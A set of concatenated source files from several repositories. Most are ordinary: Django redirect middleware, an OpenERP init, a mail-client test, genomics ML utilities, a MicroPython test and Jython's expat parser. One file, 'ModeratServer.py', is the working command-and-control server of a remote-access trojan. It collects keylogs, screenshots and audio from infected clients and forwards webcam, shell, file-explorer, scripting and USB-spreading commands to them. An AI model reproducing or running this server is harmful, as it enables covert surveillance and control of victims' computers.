path = request.get_full_path()
try:
r = Redirect.objects.get(site__id__exact=settings.SITE_ID, old_path=path)
except Redirect.DoesNotExist:
r = None
if r is None and settings.APPEND_SLASH:
# Try removing the trailing slash.
try:
r = Redirect.objects.get(site__id__exact=settings.SITE_ID,
old_path=path[:path.rfind('/')]+path[path.rfind('/')+1:])
except Redirect.DoesNotExist:
pass
if r is not None:
if r.new_path == '':
return http.HttpResponseGone()
return http.HttpResponsePermanentRedirect(r.new_path)
# No redirect was found. Return the response.
return response
| bsd-3-clause |
hbrunn/OpenUpgrade | addons/base_report_designer/__init__.py | 421 | 1136 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import base_report_designer
import installer
import openerp_sxw2rml
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
pixelated/pixelated-user-agent | service/test/integration/test_mark_as_read_unread.py | 2 | 4293 | #
# Copyright (c) 2014 ThoughtWorks, Inc.
#
# Pixelated is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pixelated is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Pixelated. If not, see <http://www.gnu.org/licenses/>.
from twisted.internet import defer
from test.support.integration import SoledadTestBase, MailBuilder
from pixelated.adapter.model.status import Status
class MarkAsReadUnreadTest(SoledadTestBase):
@defer.inlineCallbacks
def test_mark_single_as_read(self):
input_mail = MailBuilder().build_input_mail()
mail = yield self.app_test_client.add_mail_to_inbox(input_mail)
mails = yield self.app_test_client.get_mails_by_tag('inbox')
self.assertNotIn('read', mails[0].status)
yield self.app_test_client.mark_many_as_read([mail.ident])
mails = yield self.app_test_client.get_mails_by_tag('inbox')
self.assertIn('read', mails[0].status)
@defer.inlineCallbacks
def test_mark_single_as_unread(self):
input_mail = MailBuilder().build_input_mail()
mail = yield self.app_test_client.add_mail_to_inbox(input_mail)
yield self.app_test_client.mark_many_as_read([mail.ident])
yield self.app_test_client.mark_many_as_unread([mail.ident])
result = (yield self.app_test_client.get_mails_by_tag('inbox'))[0]
self.assertNotIn('read', result.status)
@defer.inlineCallbacks
def test_mark_many_mails_as_unread(self):
input_mail = MailBuilder().with_status([Status.SEEN]).build_input_mail()
input_mail2 = MailBuilder().with_status([Status.SEEN]).build_input_mail()
mail1 = yield self.app_test_client.add_mail_to_inbox(input_mail)
mail2 = yield self.app_test_client.add_mail_to_inbox(input_mail2)
yield self.app_test_client.mark_many_as_read([mail1.ident, mail2.ident])
yield self.app_test_client.mark_many_as_unread([mail1.ident, mail2.ident])
mails = yield self.app_test_client.get_mails_by_tag('inbox')
self.assertNotIn('read', mails[0].status)
self.assertNotIn('read', mails[1].status)
@defer.inlineCallbacks
def test_mark_many_mails_as_read(self):
input_mail = MailBuilder().build_input_mail()
input_mail2 = MailBuilder().build_input_mail()
yield self.app_test_client.add_mail_to_inbox(input_mail)
yield self.app_test_client.add_mail_to_inbox(input_mail2)
mails = yield self.app_test_client.get_mails_by_tag('inbox')
self.assertNotIn('read', mails[0].status)
self.assertNotIn('read', mails[1].status)
yield self.app_test_client.mark_many_as_read([mails[0].ident, mails[1].ident])
mails = yield self.app_test_client.get_mails_by_tag('inbox')
self.assertIn('read', mails[0].status)
self.assertIn('read', mails[1].status)
@defer.inlineCallbacks
def test_mark_mixed_status_as_read(self):
input_mail = MailBuilder().with_subject('first').build_input_mail()
input_mail2 = MailBuilder().with_subject('second').build_input_mail()
yield self.app_test_client.add_mail_to_inbox(input_mail)
mail2 = yield self.app_test_client.add_mail_to_inbox(input_mail2)
yield self.app_test_client.mark_many_as_read([mail2.ident])
mails = yield self.app_test_client.get_mails_by_tag('inbox')
read_mails = filter(lambda x: 'read' in x.status, mails)
unread_mails = filter(lambda x: 'read' not in x.status, mails)
self.assertEquals(1, len(unread_mails))
self.assertEquals(1, len(read_mails))
yield self.app_test_client.mark_many_as_read([mails[0].ident, mails[1].ident])
mails = yield self.app_test_client.get_mails_by_tag('inbox')
self.assertIn('read', mails[0].status)
self.assertIn('read', mails[1].status)
| agpl-3.0 |
Swordf1sh/Moderat | Server/ModeratServer.py | 1 | 21574 | import ast
import logging
import coloredlogs
import os
import datetime
import time
from twisted.internet.protocol import ServerFactory
from twisted.internet import task
from twisted.protocols.basic import LineReceiver
from db.DatabaseManagment import MDB
from commands import client
class ModeratServerProtocol(LineReceiver):
delimiter = '[ENDOFMESSAGE]'
MAX_LENGTH = 1024 * 1024 * 100 # 100MB
def __init__(self):
# dicts for download
self.screenshots_dict = {}
self.keylogs_dict = {}
self.audio_dict = {}
def rawDataReceived(self, data):
pass
# New Connection Made
def connectionMade(self):
self.send_message(self, 'connectSuccess', 'connectSuccess')
def connectionLost(self, reason):
self.transport.abortConnection()
# Delete Socket Entry
for key, value in self.factory.clients.items():
if value['socket'] == self:
self.factory.database.set_client_offline(key)
del self.factory.clients[key]
self.factory.log.warning('[CLIENT] Client (%s) Disconnected' % (value['key'] if value.has_key('key') else 'UNKNOWN'))
# Delete Moderator Entry
try:
for key, value in self.factory.moderators.items():
if value['socket'] == self:
# Set Moderator Offline
self.factory.database.set_status(value['username'], 0)
self.factory.log.warning('[MODERATOR] Moderator (%s) Disconnected' % value['username'])
del self.factory.moderators[key]
except KeyError:
pass
def lineLengthExceeded(self, line):
self.factory.log.warning('[SERVER] Data Length Exceeded from {}'.format(self.transport.getPeer().host))
def lineReceived(self, line):
try:
command = ast.literal_eval(line)
except SyntaxError:
return
# Switch to client commands
if command['from'] == 'client':
if not command['mode'] == 'infoChecker':
self.factory.log.info('[*RECV] [Client: %s] [Mode: (%s)]' % (self.transport.getPeer().host, command['mode']))
if command.has_key('module_id'):
client.CheckCommand(self, command['payload'], command['mode'], command['session_id'], command['key'],
command['module_id'])
else:
client.CheckCommand(self, command['payload'], command['mode'], command['session_id'], command['key'], '')
# Switch to moderator commands
elif command['from'] == 'moderator':
if not command['mode'] == 'getModerators' and not command['mode'] == 'getClients':
self.factory.log.info('[*RECV] [Moderator: %s] [Mode: (%s)]' % (self.transport.getPeer().host, command['mode']))
self.moderator_commands(command['payload'], command['mode'], command['session_id'], command['to'],
command['module_id'])
# Moderator Commands
def moderator_commands(self, payload, mode, session_id, client_key, module_id):
if mode == 'moderatorInitializing':
# Initializing Moderator
self.factory.log.debug('[MODERATOR] Initializing Moderator [FROM: %s]' % self.transport.getPeer().host)
if payload.startswith('auth '):
credentials = payload.split()
if len(credentials) == 3:
command, username, password = payload.split()
# If Login Success
if self.factory.database.login_user(username, password):
privileges = self.factory.database.get_privs(username)
self.send_message(self, 'loginSuccess %s' % privileges, 'moderatorInitializing')
self.factory.moderators[session_id] = {'username': username, 'socket': self}
self.factory.database.set_last_online(username, datetime.datetime.now())
self.factory.database.set_status(username, 1)
self.factory.log.debug('[MODERATOR] Moderator (%s) Login Success' % username)
# if Login Not Success
else:
self.send_message(self, 'loginError', 'moderatorInitializing')
self.factory.log.error('[MODERATOR] Moderator (%s) Login Error' % username)
else:
self.factory.log.critical('[MALFORMED] Moderator Login Data')
# Initialized Moderator
elif self.factory.moderators.has_key(session_id):
moderator_username = self.factory.moderators[session_id]['username']
if mode == 'getClients' and session_id in self.factory.moderators:
if self.factory.database.get_privs(moderator_username) == 1:
clients_ids = []
temp_clients_ids = self.factory.database.get_all_clients()
for client_id in temp_clients_ids:
_id = client_id[0]
if self.factory.database.get_privs(self.factory.database.get_moderator(
_id)) == 0 or moderator_username == self.factory.database.get_moderator(_id):
clients_ids.append(client_id)
else:
clients_ids = self.factory.database.get_clients(moderator_username)
shared_clients = {}
# for online clients
for client_id in clients_ids:
_id = client_id[0]
# Online Clients
if self.factory.clients.has_key(_id) and self.factory.clients[_id].has_key('os_type'):
shared_clients[_id] = {
'moderator': self.factory.database.get_moderator(_id),
'alias': self.factory.database.get_alias(_id),
'ip_address': self.factory.clients[_id]['ip_address'],
'os_type': self.factory.clients[_id]['os_type'],
'os': self.factory.clients[_id]['os'],
'user': self.factory.clients[_id]['user'],
'privileges': self.factory.clients[_id]['privileges'],
'audio_device': self.factory.clients[_id]['audio_device'],
'webcamera_device': self.factory.clients[_id]['webcamera_device'],
'window_title': self.factory.clients[_id]['window_title'],
'key': self.factory.clients[_id]['key'],
'kts': self.factory.clients[_id]['kts'],
'kt': self.factory.clients[_id]['kt'],
'ats': self.factory.clients[_id]['ats'],
'at': self.factory.clients[_id]['at'],
'sts': self.factory.clients[_id]['sts'],
'std': self.factory.clients[_id]['std'],
'st': self.factory.clients[_id]['st'],
'usp': self.factory.clients[_id]['usp'],
'status': True
}
# Offline Clients
else:
shared_clients[_id] = {
'moderator': self.factory.database.get_moderator(_id),
'key': _id,
'alias': self.factory.database.get_alias(_id),
'ip_address': self.factory.database.get_ip_address(_id),
'last_online': self.factory.database.get_last_online(_id),
'status': False
}
self.send_message(self, shared_clients, 'getClients')
# Note Save Mode
elif mode == 'saveNote':
splitted = payload.split('%SPLITTER%')
if len(splitted) == 2:
client_id, note_body = splitted
self.factory.database.save_note(client_id, note_body)
# Get Note
elif mode == 'getNote':
self.send_message(self, '{}'.format(self.factory.database.get_note(payload)), mode, module_id=module_id)
# Set Alias For Client
elif mode == 'setAlias':
alias_data = payload.split()
try:
alias_client = alias_data[0]
alias_value = u' '.join(alias_data[1:])
self.factory.log.debug('[MODERATOR][{0}] Add Alias ({1}) for ({2})'.format(moderator_username, alias_value,
self.transport.getPeer().host))
self.factory.database.set_alias(alias_client, alias_value)
except:
self.factory.log.critical('[MALFORMED][{0}] [MODE: {1}]'.format(moderator_username, mode))
elif mode == 'removeClient':
client = payload
self.factory.database.delete_client(client)
self.factory.log.debug('[MODERATOR][{0}] Client ({1}) Removed'.format(moderator_username, client))
elif mode == 'countData':
screen_data = payload.split()
if len(screen_data) == 2:
client_id, date = screen_data
counted_data = {
'screenshots': {
'new': self.factory.database.get_screenshots_count_0(client_id, date),
'old': self.factory.database.get_screenshots_count_1(client_id, date)
},
'keylogs': {
'new': self.factory.database.get_keylogs_count_0(client_id, date),
'old': self.factory.database.get_keylogs_count_1(client_id, date)
},
'audio': {
'new': self.factory.database.get_audios_count_0(client_id, date),
'old': self.factory.database.get_audios_count_1(client_id, date)
}
}
self.send_message(self, counted_data, mode, module_id=module_id)
else:
self.factory.log.critical('[MALFORMED][{0}] [MODE: {1}]'.format(moderator_username, mode))
elif mode == 'downloadLogs':
if type(payload) == dict:
download_info = payload
# Get All Logs
if download_info['screenshot']:
screenshots = self.factory.database.get_all_new_screenshots(download_info['client_id'],
download_info['date']) \
if download_info['filter'] else self.factory.database.get_all_screenshots(
download_info['client_id'], download_info['date'])
else:
screenshots = []
if download_info['keylog']:
keylogs = self.factory.database.get_all_new_keylogs(download_info['client_id'], download_info['date']) \
if download_info['filter'] else self.factory.database.get_all_keylogs(download_info['client_id'],
download_info['date'])
else:
keylogs = []
if download_info['audio']:
audios = self.factory.database.get_all_new_audios(download_info['client_id'], download_info['date']) \
if download_info['filter'] else self.factory.database.get_all_audios(download_info['client_id'],
download_info['date'])
else:
audios = []
# Send Counted Logs
counted_logs = {
'screenshots': len(screenshots),
'keylogs': len(keylogs),
'audios': len(audios),
}
self.send_message(self, counted_logs, mode, module_id=module_id)
# Start Send Screenshots
for screenshot in screenshots:
if os.path.exists(screenshot[2]):
screenshot_info = {
'type': 'screenshot',
'datetime': screenshot[1],
'raw': open(screenshot[2], 'rb').read(),
'window_title': screenshot[3],
'date': screenshot[4]
}
self.send_message(self, screenshot_info, 'downloadLog', module_id=module_id)
self.factory.database.set_screenshot_viewed(screenshot[1])
else:
self.factory.log.info('[SERVER] File Not Found Delete Entry (%s)' % screenshot[2])
self.factory.database.delete_screenshot(screenshot[1])
# Start Send Keylogs
for keylog in keylogs:
if os.path.exists(keylog[3]):
keylog_info = {
'type': 'keylog',
'datetime': keylog[1],
'date': keylog[2],
'raw': open(keylog[3], 'rb').read()
}
self.send_message(self, keylog_info, 'downloadLog', module_id=module_id)
self.factory.database.set_keylog_viewed(keylog[1])
else:
self.factory.log.info('[SERVER] File Not Found Delete Entry (%s)' % keylog[3])
self.factory.database.delete_keylog(keylog[1])
# Start Send Audios
for audio in audios:
if os.path.exists(audio[3]):
audio_info = {
'type': 'audio',
'datetime': audio[1],
'date': audio[2],
'raw': open(audio[3], 'rb').read()
}
self.send_message(self, audio_info, 'downloadLog', module_id=module_id)
self.factory.database.set_audio_viewed(audio[1])
else:
self.factory.log.info('[SERVER] File Not Found Delete Entry (%s)' % audio[3])
self.factory.database.delete_audios(audio[1])
self.send_message(self, {'type': 'endDownloading', }, 'downloadLog', module_id=module_id)
else:
self.factory.log.critical('[MALFORMED][TYPE] [MODE: {0}] [TYPE: {1}]'.format(mode, type(payload)))
# Get Moderators List
elif mode == 'getModerators' and self.factory.database.get_privs(moderator_username) == 1:
all_moderators = self.factory.database.get_moderators()
result = {}
for moderator in all_moderators:
all_clients_count = len(self.factory.database.get_clients(moderator[0]))
offline_clients_count = len(self.factory.database.get_offline_clients(moderator[0]))
result[moderator[0]] = {
'privileges': moderator[2],
'offline_clients': offline_clients_count,
'online_clients': all_clients_count - offline_clients_count,
'status': moderator[3],
'last_online': moderator[4],
}
self.send_message(self, result, 'getModerators')
# ADMIN PRIVILEGES
# Add Moderator
elif mode == 'addModerator' and self.factory.database.get_privs(moderator_username) == 1:
credentials = payload.split()
if len(credentials) == 3:
username, password, privileges = credentials
self.factory.database.create_user(username, password, int(privileges))
self.factory.log.debug('[MODERATOR][{0}] ({1}) Created With Password: ({2}), Privileges: ({3})'.format(
moderator_username, username, password.replace(password[3:], '***'), privileges))
elif mode == 'setModerator' and self.factory.database.get_privs(moderator_username) == 1:
credentials = payload.split()
if len(credentials) == 2:
client_id, moderator_id = credentials
self.factory.database.set_moderator(client_id, moderator_id)
self.factory.log.debug('[MODERATOR][{0}] Moderator Changed For Client ({1}) to ({2})'.format(
moderator_username, client_id, moderator_id))
elif mode == 'changePassword' and self.factory.database.get_privs(moderator_username) == 1:
credentials = payload.split()
if len(credentials) == 2:
moderator_id, new_password = credentials
self.factory.database.change_password(moderator_id, new_password)
self.factory.log.debug('[MODERATOR][{0}] Moderator ({1}) Password Changed to ({2})'.format(
moderator_username, moderator_id, new_password.replace(new_password[3:], '***')))
elif mode == 'changePrivilege' and self.factory.database.get_privs(moderator_username) == 1:
credentials = payload.split()
if len(credentials) == 2:
moderator_id, new_privilege = credentials
self.factory.database.change_privileges(moderator_id, new_privilege)
self.factory.log.debug('[MODERATOR][{0}] Moderator ({1}) Privilege Changed to ({2})'.format(
moderator_username, moderator_id, new_privilege))
elif mode == 'removeModerator' and self.factory.database.get_privs(moderator_username) == 1:
moderator_id = payload
self.factory.database.delete_user(moderator_id)
self.factory.log.debug('[MODERATOR][{0}] Moderator ({1}) Removed'.format(
moderator_username, moderator_id))
# For Only Administrators
elif mode in ['terminateClient'] and self.factory.database.get_privs(moderator_username) == 1:
self.send_message(self.factory.clients[client_key]['socket'], payload, mode,
session_id=session_id)
# Forward To Client
elif mode in ['getScreen', 'getWebcam', 'setLogSettings', 'updateSource', 'p2pMode',
'shellMode', 'explorerMode', 'terminateProcess', 'scriptingMode', 'usbSpreading']:
try:
self.send_message(self.factory.clients[client_key]['socket'], payload, mode,
session_id=session_id, module_id=module_id)
except KeyError as e:
pass
else:
self.factory.log.critical('[MALFORMED][MODE] [MODE: {0}] [MODERATOR: {1}]'.format(moderator_username, mode))
else:
self.factory.log.critical('[MALFORMED][SESSION] [MODE: {0}] [SESSION: {1}]'.format(mode, session_id))
# Send Message To Client
def send_message(self, to, message, mode, session_id='', module_id='', end='[ENDOFMESSAGE]'):
# Send Data Function
to.transport.write(str({
'payload': message,
'mode': mode,
'from': 'server',
'session_id': session_id,
'module_id': module_id,
}) + end)
self.factory.log.info('[*SENT] [TO: %s] [FROM: %s] [MODE: %s]' % (
to.transport.getPeer().host, self.transport.getPeer().host, mode))
class ModeratServerFactory(ServerFactory):
# Custom Colored Logging
log = logging.getLogger('Moderat')
coloredlogs.install(level='DEBUG')
DATA_STORAGE = r'/media/root/STORAGE/MODERAT_DATA/'
database = MDB()
# Clear Clients and Moderators Status
database.set_client_status_zero()
database.set_moderator_status_zero()
moderators = {}
clients = {}
log.debug('[SERVER] Moderat Server Started')
protocol = ModeratServerProtocol
def __init__(self):
self.clientInfoChecker = task.LoopingCall(self.infoChecker)
self.clientInfoChecker.start(5)
def infoChecker(self, session_id='', module_id='', end='[ENDOFMESSAGE]'):
for key in self.clients.keys():
client = self.clients[key]['socket']
client.transport.write(str({
'payload': 'infoChecker',
'mode': 'infoChecker',
'from': 'server',
'session_id': session_id,
'module_id': module_id,
}) + end) | gpl-2.0 |
sss1/DeepInteractions | pairwise/util.py | 2 | 5513 | import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, log_loss, roc_curve, auc, precision_recall_curve, average_precision_score
def initialize_with_JASPAR(enhancer_conv_layer, promoter_conv_layer):
JASPAR_motifs = list(np.load('/home/sss1/Desktop/projects/DeepInteractions/JASPAR_CORE_2016_vertebrates.npy'))
print 'Initializing ' + str(len(JASPAR_motifs)) + ' kernels with JASPAR motifs.'
enhancer_conv_weights = enhancer_conv_layer.get_weights()
promoter_conv_weights = promoter_conv_layer.get_weights()
reverse_motifs = [JASPAR_motifs[19][::-1,::-1], JASPAR_motifs[97][::-1,::-1],
JASPAR_motifs[98][::-1,::-1], JASPAR_motifs[99][::-1,::-1],
JASPAR_motifs[100][::-1,::-1], JASPAR_motifs[101][::-1,::-1]]
JASPAR_motifs = JASPAR_motifs + reverse_motifs
for i in xrange(len(JASPAR_motifs)):
m = JASPAR_motifs[i][::-1,:]
w = len(m)
start = np.random.randint(low=3, high=30-w+1-3)
enhancer_conv_weights[0][i,:,start:start+w,0] = m.T - 0.25
enhancer_conv_weights[1][i] = np.random.uniform(low=-1.0,high=0.0)
promoter_conv_weights[0][i,:,start:start+w,0] = m.T - 0.25
promoter_conv_weights[1][i] = np.random.uniform(low=-1.0,high=0.0)
enhancer_conv_layer.set_weights(enhancer_conv_weights)
promoter_conv_layer.set_weights(promoter_conv_weights)
# Splits the data into training and validation data, keeping training_frac of
# the input samples in the training set and the rest for validation
def split_train_and_val_data(X_enhancer_train, X_promoter_train, y_train, training_frac):
n_train = int(training_frac * np.shape(y_train)[0]) # number of training samples
X_enhancer_val = X_enhancer_train[n_train:, :]
X_enhancer_train = X_enhancer_train[:n_train, :]
X_promoter_val = X_promoter_train[n_train:, :]
X_promoter_train = X_promoter_train[:n_train, :]
y_val = y_train[n_train:]
y_train = y_train[:n_train]
return X_enhancer_train, X_promoter_train, y_train, X_enhancer_val, X_promoter_val, y_val
# Calculates and prints several metrics (confusion matrix, Precision/Recall/F1)
# in real time; also updates the values in the conf_mat_callback so they can be
# plotted or analyzed later
def print_live(conf_mat_callback, y_val, val_predict, logs):
conf_mat = confusion_matrix(y_val, val_predict).astype(float)
precision = conf_mat[1, 1] / conf_mat[:, 1].sum()
recall = conf_mat[1, 1] / conf_mat[1, :].sum()
f1_score = 2 * precision * recall / (precision + recall)
acc = (conf_mat[0, 0] + conf_mat[1, 1]) / np.sum(conf_mat)
loss = log_loss(y_val, val_predict)
conf_mat_callback.precisions.append(precision)
conf_mat_callback.recalls.append(recall)
conf_mat_callback.f1_scores.append(f1_score)
conf_mat_callback.losses.append(loss)
conf_mat_callback.accs.append(acc)
print '\nConfusion matrix:\n' + str(conf_mat) + '\n'
print 'Precision: ' + str(precision) + \
' Recall: ' + str(recall) + \
' F1: ' + str(f1_score) + \
' Accuracy: ' + str(acc) + \
' Log Loss: ' + str(loss)
print 'Predicted fractions: ' + str(val_predict.mean())
print 'Actual fractions: ' + str(y_val.mean()) + '\n'
# Plots several metrics (Precision/Recall/F1, loss, Accuracy) in real time
# (i.e., after each epoch)
def plot_live(conf_mat_callback):
epoch = conf_mat_callback.epoch
plt.clf()
xs = [1 + i for i in range(epoch)]
precisions_plot = plt.plot(xs, conf_mat_callback.precisions, label = 'Precision')
recalls_plot = plt.plot(xs, conf_mat_callback.recalls, label = 'Recall')
f1_scores_plot = plt.plot(xs, conf_mat_callback.f1_scores, label = 'F1 score')
accs_plot = plt.plot(xs, conf_mat_callback.accs, label = 'Accuracy')
losses_plot = plt.plot(xs, conf_mat_callback.losses / max(conf_mat_callback.losses), label = 'Loss')
batch_xs = [1 + epoch * float(i)/len(conf_mat_callback.training_losses) for i in range(len(conf_mat_callback.training_losses))]
training_losses_plot = plt.plot(batch_xs, conf_mat_callback.training_losses / max(conf_mat_callback.training_losses), label = 'Training Loss')
training_losses_plot = plt.plot(batch_xs, conf_mat_callback.training_accs, label = 'Training Accuracy')
plt.legend(bbox_to_anchor = (0, 1), loc = 4, borderaxespad = 0., prop={'size':6})
plt.ylim([0, 1])
plt.pause(.001)
# Given a (nearly) balanced data set (i.e., labeled enhancer and promoter
# sequence pairs), subsamples the positive samples to produce the desired
# fraction of positive samples; retains all negative samples
def subsample_imbalanced(X_enhancer, X_promoter, y, positive_subsample_frac):
n = np.shape(y_train)[0] # sample size (i.e., number of pairs)
# indices that are positive and selected to be retained or negative
to_keep = (np.random(n) < positive_subsample_frac) or (y == 1)
return X_enhancer[to_keep, :], X_promoter[to_keep, :], y[to_keep]
def compute_AUPR(y, y_score):
# print 'Computing Precision-Recall curve...'
precision, recall, _ = precision_recall_curve(y, y_score)
average_precision = average_precision_score(y, y_score)
def plot_PR_curve(y, y_score):
# print 'Computing Precision-Recall curve...'
precision, recall, _ = precision_recall_curve(y, y_score)
return average_precision_score(y, y_score)
def plot_ROC_curve(y, y_score):
# print 'Computing ROC curve...'
fpr, tpr, thresholds = roc_curve(y, y_score)
return auc(fpr, tpr)
| gpl-3.0 |
dinau/micropython | tests/basics/namedtuple1.py | 16 | 1352 | try:
from collections import namedtuple
except ImportError:
from ucollections import namedtuple
T = namedtuple("Tup", ["foo", "bar"])
# CPython prints fully qualified name, what we don't bother to do so far
#print(T)
for t in T(1, 2), T(bar=1, foo=2):
print(t)
print(t[0], t[1])
print(t.foo, t.bar)
print(len(t))
print(bool(t))
print(t + t)
print(t * 3)
print([f for f in t])
print(isinstance(t, tuple))
try:
t[0] = 200
except TypeError:
print("TypeError")
try:
t.bar = 200
except AttributeError:
print("AttributeError")
try:
t = T(1)
except TypeError:
print("TypeError")
try:
t = T(1, 2, 3)
except TypeError:
print("TypeError")
try:
t = T(foo=1)
except TypeError:
print("TypeError")
try:
t = T(1, foo=1)
except TypeError:
print("TypeError")
# enough args, but kw is wrong
try:
t = T(1, baz=3)
except TypeError:
print("TypeError")
# bad argument for member spec
try:
namedtuple('T', 1)
except TypeError:
print("TypeError")
# Try single string
T3 = namedtuple("TupComma", "foo bar")
t = T3(1, 2)
print(t.foo, t.bar)
# Try tuple
T4 = namedtuple("TupTuple", ("foo", "bar"))
t = T4(1, 2)
print(t.foo, t.bar)
# Try single string with comma field seperator
# Not implemented so far
#T2 = namedtuple("TupComma", "foo,bar")
#t = T2(1, 2)
| mit |
wreckJ/intellij-community | python/lib/Lib/xml/parsers/expat.py | 73 | 21923 | # coding: utf-8
#------------------------------------------------------------------------------
# Copyright (c) 2008 Sébastien Boisgérault
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# -----------------------------------------------------------------------------
__all__ = ["ExpatError", "ParserCreate", "XMLParserType", "error", "errors"]
# Jython check
import sys
if not sys.platform.startswith('java'):
raise ImportError("this version of expat requires the jython interpreter")
# Standard Python Library
import re
import types
# Jython
from org.python.core import Py
from org.python.core.util import StringUtil
from jarray import array
# Java Standard Edition
from java.io import ByteArrayInputStream
from java.lang import String, StringBuilder
from org.xml.sax import InputSource
from org.xml.sax import SAXNotRecognizedException, SAXParseException
from org.xml.sax.helpers import XMLReaderFactory
from org.xml.sax.ext import DefaultHandler2
# Xerces
try:
# Name mangled by jarjar?
import org.python.apache.xerces.parsers.SAXParser
_xerces_parser = "org.python.apache.xerces.parsers.SAXParser"
except ImportError:
_xerces_parser = "org.apache.xerces.parsers.SAXParser"
# @expat args registry
_register = {}
def ParserCreate(encoding=None, namespace_separator=None):
return XMLParser(encoding, namespace_separator)
class XMLParser(object):
def __init__(self, encoding, namespace_separator):
self.encoding = encoding
self.CurrentLineNumber = 1
self.CurrentColumnNumber = 0
self._NextLineNumber = 1
self._NextColumnNumber = 0
self.ErrorLineNumber = -1
self.ErrorColumnNumber = -1
self.ErrorCode = None
if namespace_separator is None:
self.namespace_separator = namespace_separator
elif isinstance(namespace_separator, basestring):
self.namespace_separator = str(namespace_separator)
if len(self.namespace_separator) > 1:
error = ("namespace_separator must be at most one character, "
"omitted, or None")
raise ValueError(error)
else:
error = ("ParserCreate() argument 2 must be string or None, "
"not %s" % type(namespace_separator).__name__)
raise TypeError(error)
self._reader = XMLReaderFactory.createXMLReader(_xerces_parser)
if self.namespace_separator is None:
try:
feature = "http://xml.org/sax/features/namespaces"
self._reader.setFeature(feature, False)
except SAXNotRecognizedException:
error = ("namespace support cannot be disabled; "
"set namespace_separator to a string of length 1.")
raise ValueError(error)
self._base = None
self._buffer_text = True
self._returns_unicode = True
self._data = StringBuilder()
self._handler = XMLEventHandler(self)
self._reader.setContentHandler(self._handler)
self._reader.setErrorHandler(self._handler)
self._reader.setDTDHandler(self._handler)
self._reader.setEntityResolver(self._handler)
sax_properties = ("lexical-handler", "declaration-handler")
for name in sax_properties:
try:
name = "http://xml.org/sax/properties/" + name
self._reader.setProperty(name, self._handler)
except SAXNotRecognizedException:
error = "can't set property %r" % name
raise NotImplementedError(error)
apache_features = (("nonvalidating/load-external-dtd", False),)
for name, value in apache_features:
try:
name = "http://apache.org/xml/features/" + name
self._reader.setFeature(name, value)
except SAXNotRecognizedException:
error = "can't set feature %r" % name
raise NotImplementedError(error)
# experimental
#f = "http://xml.org/sax/features/external-general-entities"
f = "http://xml.org/sax/features/external-parameter-entities"
#self._reader.setFeature(f, False)
# check
f = "http://xml.org/sax/features/use-entity-resolver2"
assert self._reader.getFeature(f)
def GetBase(self):
return self._base
def SetBase(self, base):
self._base = base
def _error(self, value=None):
raise AttributeError("'XMLParser' has no such attribute")
def _get_buffer_text(self):
return self._buffer_text
def _set_buffer_text(self, value):
self._buffer_text = bool(value)
def _get_returns_unicode(self):
return bool(self._returns_unicode)
def _set_returns_unicode(self, value):
self._returns_unicode = value
# 'ordered' and 'specified' attributes are not supported
ordered_attributes = property(_error, _error)
specified_attributes = property(_error, _error)
# any setting is allowed, but it won't make a difference
buffer_text = property(_get_buffer_text, _set_buffer_text)
# non-significant read-only values
buffer_used = property(lambda self: None)
buffer_size = property(lambda self: None)
# 'returns_unicode' attribute is properly supported
returns_unicode = property(_get_returns_unicode, _set_returns_unicode)
def _expat_error(self, sax_error):
sax_message = sax_error.getMessage()
pattern = 'The entity ".*" was referenced, but not declared\.'
if re.match(pattern, sax_message):
expat_message = "undefined entity: line %s, column %s" % \
(self.ErrorLineNumber, self.ErrorColumnNumber)
else:
expat_message = sax_message
error = ExpatError(expat_message)
error.lineno = self.ErrorLineNumber
error.offset = self.ErrorColumnNumber
error.code = self.ErrorCode
return error
def Parse(self, data, isfinal=False):
# The 'data' argument should be an encoded text: a str instance that
# represents an array of bytes. If instead it is a unicode string,
# only the us-ascii range is considered safe enough to be silently
# converted.
if isinstance(data, unicode):
data = data.encode(sys.getdefaultencoding())
self._data.append(data)
if isfinal:
bytes = StringUtil.toBytes(self._data.toString())
byte_stream = ByteArrayInputStream(bytes)
source = InputSource(byte_stream)
if self.encoding is not None:
source.setEncoding(self.encoding)
try:
self._reader.parse(source)
except SAXParseException, sax_error:
# Experiments tend to show that the '_Next*' parser locations
# match more closely expat behavior than the 'Current*' or sax
# error locations.
self.ErrorLineNumber = self._NextLineNumber
self.ErrorColumnNumber = self._NextColumnNumber
self.ErrorCode = None
raise self._expat_error(sax_error)
return 1
def ParseFile(self, file):
# TODO: pseudo-buffering if a read without argument is not supported.
# document parse / parsefile usage.
